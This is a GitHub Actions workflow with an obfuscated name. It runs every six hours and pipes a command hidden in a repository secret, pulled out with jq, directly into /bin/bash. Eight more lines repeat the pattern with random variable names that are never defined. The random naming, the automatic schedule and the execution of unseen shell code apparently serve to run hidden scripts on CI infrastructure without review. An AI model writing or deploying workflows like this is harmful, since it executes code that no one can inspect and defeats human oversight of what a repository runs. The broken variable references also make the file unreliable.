name: regulatehighjump

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: regulatehighjump
        env:
          os076: ${{ secrets.os076 }}
        run: |
          echo $os076 | jq -r .iiav25 | /bin/bash
          echo $gd08886 | jq -r .wl07 | /bin/bash
          echo $roxe0 | jq -r .svmyz40210 | /bin/bash
          echo $yty314 | jq -r .thzs5522 | /bin/bash
          echo $evp9 | jq -r .l4166 | /bin/bash
          echo $qyxe7 | jq -r .f787 | /bin/bash
          echo $x91 | jq -r .w878 | /bin/bash
          echo $vompf30 | jq -r .r2589 | /bin/bash
          echo $qtgm62 | jq -r .m1133 | /bin/bash

